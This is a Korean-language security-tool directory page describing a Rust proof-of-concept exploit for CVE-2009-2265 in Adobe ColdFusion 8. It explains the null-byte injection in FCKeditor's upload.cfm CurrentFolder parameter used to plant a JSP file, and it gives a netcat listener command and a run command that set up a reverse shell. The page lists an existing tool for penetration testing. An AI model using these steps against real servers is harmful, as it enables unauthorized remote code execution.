Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2009-2265 — A Rust 구현으로 작성된 CVE-2009-2265 익스플로잇 POC로, Adobe ColdFusion 8을 대상으로 합니다. | Kitploit
도구/GitHubGitHub/nika0x38/cve-2009-2265
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubnika0x38/cve-2009-2265

CVE-2009-2265

A Rust 구현으로 작성된 CVE-2009-2265 익스플로잇 POC로, Adobe ColdFusion 8을 대상으로 합니다.

저장소 보기
111개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2009-2265 - Adobe ColdFusion 8 파일 업로드 RCE

RustSecurity

CVE-2009-2265 익스플로잇에 대한 POC의 Rust 구현, Adobe ColdFusion 8을 대상으로 합니다.


취약점 개요

이 취약점은 인증되지 않은 공격자가 Adobe ColdFusion 8을 실행하는 서버의 웹 접근 가능 디렉터리에 임의의 파일을 업로드하여 원격 코드 실행(RCE)을 유발할 수 있게 합니다.

기술적 세부사항

  • 취약점: 널 바이트 주입을 통한 디렉터리 트래버설
  • 구성 요소: FCKeditor upload.cfm 커넥터
  • 파라미터: CurrentFolder
  • 영향: 원격 코드 실행(RCE)
  • 영향을 받는 소프트웨어: Adobe ColdFusion 8.0.1 및 이전 버전

설명

이 취약점은 /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm에 위치한 FCKeditor 구성 요소의 파일 업로드 기능에 존재합니다. CurrentFolder HTTP GET 파라미터가 적절히 검증되지 않아 널 바이트(%00) 주입 공격이 가능합니다.

CurrentFolder 파라미터를 /<filename>.jsp%00으로 설정한 요청을 구성함으로써 공격자는 서버 측 확장자 검사를 우회할 수 있습니다. 기본 시스템(종종 Java)은 널 바이트를 문자열의 끝으로 해석하여 파일 이름을 <filename>.jsp로 처리합니다. 이를 통해 공격자는 악성 JSP 파일을 업로드할 수 있습니다. 서버는 이 파일을 공개적으로 접근 가능한 디렉터리(/userfiles/file/)에 저장하며, 해당 URL에 접근하기만 하면 실행됩니다.

이 POC는 JSP 리버스 셸 페이로드를 생성하고, 널 바이트 취약점을 이용하여 업로드한 후, 이를 트리거하여 대상 시스템에서 셸을 획득하는 과정을 자동화합니다.

사용법

익스플로잇을 컴파일하고 실행하려면 다음 단계를 따르세요.

1단계: Netcat 리스너 설정

익스플로잇을 실행하기 전에 로컬 머신에서 들어오는 리버스 셸을 수신할 리스너를 시작하세요.

root@kitploit:~

nc -lnvp <attacker-port>

2단계: 익스플로잇 실행

컴파일된 바이너리를 실행하여 리버스 셸용 로컬 호스트/포트와 원격 대상의 호스트/포트를 제공하세요.

root@kitploit:~

cargo run -- --lhost <LHOST> --lport <LPORT> --rhost <RHOST> --rport <RPORT>

스크립트가 페이로드를 트리거한 후 Netcat 리스너에서 연결을 수신해야 합니다.

면책 조항

이 도구는 교육 및 승인된 침투 테스트 목적으로만 사용됩니다. 책임감 있게 사용하고 자신이 소유했거나 명시적 권한이 있는 시스템에서만 사용하세요.

도구 다운로드